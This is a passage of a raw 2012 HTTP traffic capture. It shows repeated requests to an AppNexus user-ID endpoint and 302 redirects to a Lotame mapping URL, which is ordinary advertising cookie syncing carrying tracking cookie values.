Cookie: cc=&quot;ACN4nGNQMDYwNE9NMzMxTrZINjU3M042MjQ2T05NSzE3NzM1NUplAIKAGbyODGDAaHXx83E9MFO4d5oTEwNbDgPDf0ZGBuZVQJqBEQgZGAV%2B1sEkGKASDGCJZmVJ7BK9s2ZiN6pBUBmHUVJGOIzasA2XjjzsEgLfDuGQ%2BBmNw6ifOjgsP92L3R%2FNP%2FVw6NikiktCDZflptglUnzn4dDB04RDgu0rdgkGPu6EXZg%2B4U7YiSk4UUcBymEEcZYhcwqROVsQHGWuN5gGcT65jSnYLngYU7Bg0TlMQad%2FizAFZerUMQX5qgSxWfQaUxAAN%2BGbHw%3D%3D&quot;; dc=1; aud=&quot;ABR4nGNgYGAImMHryMDAaHXx83E9Bg4GBq9VDCDgehBCHQNTlg0Q3hwwpVgN4a2EUIwNDA0A214Log%3D%3D&quot;; OAID=3017ef643c8c5763c2137cefd776552e
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Nov 2012 19:02:26 GMT
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
X-Server: 172.25.10.66
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 247
GET /getuid?http%3A%2F%2Fbcp.crwdcntrl.net%2Fmap%2Fc=281%2Frand=611118481%2Ftpid%3D%24UID%2Ftp%3DANXS HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/c=938/rand=134828210/pv=y/rt=ifr
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 03-Feb-2013 19:02:26 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 06-Nov-2012 19:02:26 GMT; domain=.adnxs.com; HttpOnly
Location: http://bcp.crwdcntrl.net/map/c=281/rand=611118481/tpid=5858721859426781856/tp=ANXS
Date: Mon, 05 Nov 2012 19:02:26 GMT
Content-Length: 0
GET /getuid?http%3A%2F%2Fbcp.crwdcntrl.net%2Fmap%2Fc=281%2Frand=31652353%2Ftpid%3D%24UID%2Ftp%3DANXS HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/c=938/rand=457112580/pv=y/rt=ifr
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 03-Feb-2013 19:02:26 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 06-Nov-2012 19:02:26 GMT; domain=.adnxs.com; HttpOnly
Location: http://bcp.crwdcntrl.net/map/c=281/rand=31652353/tpid=5858721859426781856/tp=ANXS
Date: Mon, 05 Nov 2012 19:02:26 GMT
Content-Length: 0
GET /getuid?http%3A%2F%2Fbcp.crwdcntrl.net%2Fmap%2Fc=281%2Frand=695985967%2Ftpid%3D%24UID%2Ftp%3DANXS HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/c=938/rand=983915993/pv=y/rt=ifr
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 03-Feb-2013 19:02:26 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 06-Nov-2012 19:02:26 GMT; domain=.adnxs.com; HttpOnly
Location: http://bcp.crwdcntrl.net/map/c=281/rand=695985967/tpid=5858721859426781856/tp=ANXS
Date: Mon, 05 Nov 2012 19:02:26 GMT
Content-Length: 0
GET /getuid?http%3A%2F%2Fbcp.crwdcntrl.net%2Fmap%2Fc=281%2Frand=465110793%2Ftpid%3D%24UID%2Ftp%3DANXS HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/ct=y/c=938/rand=106727151/pv=y/rt=ifr
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 03-Feb-2013 19:02:26 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 06-Nov-2012 19:02:26 GMT; domain=.adnxs.com; HttpOnly
Location: http://bcp.crwdcntrl.net/map/c=281/rand=465110793/tpid=5858721859426781856/tp=ANXS
Date: Mon, 05 Nov 2012 19:02:26 GMT
Content-Length: 0
GET /getuid?http%3A%2F%2Fbcp.crwdcntrl.net%2Fmap%2Fc=281%2Frand=853757126%2Ftpid%3D%24UID%2Ftp%3DANXS HTTP/1.1

Host: ib.adnxs.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/5/c=938/rand=572810405/pv=y/rt=ifr
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG7]PCxrx)0s]#%2L_'x%SEV/hnJip8Ep.I(G*axlrk5.$WN_]Dl5M7G(nDS'6pnU
HTTP/1.1 302 Moved

Content-Type: text/html; charset=ISO-8859-1
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Sun, 03-Feb-2013 19:02:26 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Tue, 06-Nov-2012 19:02:26 GMT; domain=.adnxs.com; HttpOnly
Location: http://bcp.crwdcntrl.net/map/c=281/rand=853757126/tpid=5858721859426781856/tp=ANXS
Date: Mon, 05 Nov 2012 19:02:26 GMT
Content-Length: 0